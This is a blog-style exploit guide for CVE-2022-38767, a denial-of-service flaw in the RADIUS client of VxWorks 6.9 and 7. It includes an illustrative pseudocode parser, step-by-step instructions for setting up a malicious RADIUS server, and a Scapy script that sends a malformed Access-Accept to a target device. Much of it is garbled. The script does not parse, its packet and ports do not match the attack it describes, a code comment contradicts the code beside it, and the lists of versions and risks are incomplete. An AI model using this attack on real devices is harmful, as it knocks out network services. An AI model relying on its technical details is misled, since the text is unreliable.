CVE-2022-38767 - How a Malicious RADIUS Packet Can Crash VxWorks (6.9 and 7) – Deep Dive and Exploit Guide

In August 2022, a critical issue, CVE-2022-38767, was revealed in Wind River VxWorks versions 6.9 and 7. This vulnerability lets a malicious or misconfigured RADIUS server take down your device just by sending a single, clever packet during the IP RADIUS access process. This post explores the ins and outs of this bug, demonstrates proof of concept, and explains how to stay safe.

Understanding the Vulnerability

At the heart of CVE-2022-38767 is the way VxWorks handles RADIUS authentication packets. During a RADIUS authentication, the VxWorks client expects packets to conform perfectly to the RADIUS protocol specification.

Sadly, VxWorks is _too trusting_: when it receives a malformed or specially crafted RADIUS packet, it tries to process it without proper checks. An attacker can send a packet with malformed attributes, over-sized fields, or illegal values that cause VxWorks to crash or hang, resulting in a denial-of-service (DoS).

Here’s why it matters

- No authentication needed: The attack can come from any RADIUS server the VxWorks device talks to, even one under an attacker’s control.

Affected Products

According to the official advisory, these are the affected versions:

VxWorks 7

Any devices using VxWorks as an OS with RADIUS authentication enabled are at risk—think routers, medical, aerospace, and industry hardware.

The Vulnerability

The RADIUS protocol involves a handshake between a client (here, VxWorks) and a RADIUS server. VxWorks expects certain packet fields to be well-formed, especially during the access request/response phase.

But in these vulnerable versions, if the RADIUS server sends a malformed or specially crafted packet, for example:

Unexpected attribute sequences.

The internal logic in the RADIUS client code gets confused—sometimes accessing out-of-bounds memory or entering infinite loops. This results in a complete DoS (the service hangs or crashes).

Code Snippet: Typical Vulnerable Handling

Below is a simplified version of vulnerable code in pseudocode (real source is proprietary), to illustrate the risky pattern:

// Simplified RADIUS packet parser in VxWorks
void process_radius_packet(uint8_t* packet, size_t length) {
    uint8_t *ptr = packet;
    while (ptr < packet + length) {
        uint8_t attr_type = *ptr++;
        uint8_t attr_len = *ptr++;

        if (attr_len < 2 || (ptr + attr_len - 2) > (packet + length)) {
            // Oops, no proper bounds checking, may cause crash
            crash_or_hang();
            return;
        }

        // Process attribute (no thorough validation)
        ptr += attr_len - 2;
    }
}

Notice: improper bounds checking leads to undefined behavior!

1. Setup Malicious RADIUS Server

You’ll need a RADIUS server (Linux + FreeRADIUS or custom Python/Scapy script) that you control.

2. Craft Malicious Packet

- Manually create a RADIUS response packet with a malformed attribute, such as length = 255, but only send a few bytes.

3. Send to VxWorks Device

Have the VxWorks client send an authentication request to your server. Respond with your crafted malicious packet.

4. Observe Crash

The service on VxWorks should hang or crash, possibly rebooting the device or at least knocking out network services.

With scapy, you can build such a response

from scapy.all import *
from scapy.layers.radius import *

# Build a malformed RADIUS packet (e.g., attribute with bogus length)
radius_response = Radius(
    code=2,  # Access-Accept
    id=,
    authenticator='\x00'*16,
    attributes=[
        (1, b'A' * 250)  # Attribute type 1, length far longer than spec
    ]
)

# Send to target VxWorks device
send(IP(dst="TARGET_IP")/UDP(sport=1812,dport=1812)/radius_response)

Warning: Use this only on systems you’re authorized to test!

Patch Immediately.

Wind River has released security updates for affected versions. Apply them as soon as possible.

References

- NVD CVE-2022-38767
- Wind River Security Notice
- RADIUS Protocol Spec (RFC 2865)
- Scapy Radius Layer

Conclusion

CVE-2022-38767 shows how critical it is for network authentication code to have *rock-solid input validation*. Even a single unchecked attribute from a remote server can take down important systems!

If you’re using VxWorks 6.9 or 7 and relying on RADIUS, update now — don’t wait for an attacker to find you first.


*This guide is exclusive and written for educational and defense purposes only.*

Timeline

Published on: 11/25/2022 15:15:00 UTC
Last modified on: 12/01/2022 13:49:00 UTC